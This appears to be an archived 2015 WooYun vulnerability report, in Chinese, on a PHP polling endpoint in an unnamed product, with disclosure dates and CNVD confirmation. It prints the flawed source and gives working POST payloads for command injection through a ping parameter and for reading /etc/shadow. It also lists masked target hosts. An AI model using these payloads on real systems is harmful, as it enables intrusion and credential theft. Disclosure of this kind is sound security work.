乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-16: 细节已通知厂商并且等待厂商处理中 2015-09-18: 厂商已经确认,细节仅向厂商公开 2015-09-21: 细节向第三方安全合作伙伴开放 2015-11-12: 细节向核心白帽子及相关领域专家公开 2015-11-22: 细节向普通白帽子公开 2015-12-02: 细节向实习白帽子公开 2015-12-17: 细节向公众公开
rt
原因出自/direct/polling/CommandsPolling.php文件,详情请看源代码:
<?php\ninclude_once 'command\/CCmdsPolling.php';\n\n$command = isset($_POST['command'])?$_POST['command']:\"\";\n$saveFile = isset($_POST['filename'])?$_POST['filename']:\"\";\n$cmdParam = isset($_POST['cmdParam'])?$_POST['cmdParam']:\"\";\n$cmdParam = trim($cmdParam);\n$faultStr = json_encode(array('type'=>'event', 'name'=>'message', 'data'=>array(\"exception\", \"\", \"\") ));\n\n\/\/command is null\nif(empty($command)){ \n echo $faultStr;\n exit();\n}\n\n\/\/exec and get result\n$result = array();\n$pollingObj = new CCmdsPolling();\nif($command == \"ping\") {\n $result = $pollingObj->getPingInfo($cmdParam, $saveFile);\n} else if ($command == \"traceroute\") {\n $result = $pollingObj->getTracerouteInfo($cmdParam, $saveFile);\n} else {\n echo $faultStr;\n exit();\n}\n\n\/\/analyse result state and return\nif($result['state'] == \"exception\") {\t\n echo $faultStr;\n} else if($result['state'] == \"starting\") {\t\t \n $re_file=$result['result'];\n $filename=$result['filename'];\n $finished=false;\n echo json_encode(array(\n 'type'=>'event',\n 'name'=>'message',\n 'data'=>array(\"starting\", $re_file, $filename)\n )); \n} else if($result['state'] == \"dealing\") {\n $re_file=$result['result']; \n $filename=$result['filename']; \n echo json_encode(array(\n 'type'=>'event', \n 'name'=>'message', \n 'data'=>array(\"dealing\", $re_file, $filename)\n )); \n} else if($result['state'] == \"finished\") {\n $re_file=$result['result']; \n echo json_encode(array(\n 'type'=>'event', \n 'name'=>'message', \n 'data'=>array(\"finished\", $re_file, \"\")\n )); \n} else { \n echo json_encode (array(\n 'type'=>'event',\n 'name'=>'message',\n 'data'=>array(\"unknown\", \"\", \"\")\n )); \n}\n\n?> \n","
如下利用方式:1.任意系统文件遍历:
https://地址/direct/polling/CommandsPolling.phpPOST:command=ping&filename=/etc/shadow&cmdParam=**.**.**.**
2.任意系统命令执行
https://地址/direct/polling/CommandsPolling.php首先发送要执行的命令,POST:command=ping&filename=&cmdParam=**.**.**.**;netstat之后获命令结果保存的文件路径,POST:command=ping&filename=&cmdParam=**.**.**.**,netstat最后获取文件内容(命令执行结果),POST:command=ping&filename=&cmdParam=**.**.**.**,netstat
案例:
**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/https://**.**.**.**/https://**.**.**.**/**.**.**.**/https://5mart.**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/https://**.**.**.**/https://**.**.**.**/**.**.**.**/https://www.**.**.**.**/**.**.**.**/**.**.**.**/https://**.**.**.**/https://www.**.**.**.**/**.**.**.**/https://**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/https://**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/https://**.**.**.**/https://**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/
联系厂商。
危害等级:高
漏洞Rank:20
确认时间:2015-09-18 13:51
CNVD确认并复现所述情况,已经由CNVD通过已有联系处置渠道向软件生产厂商通报。 对方反馈已经在积极处置.
暂无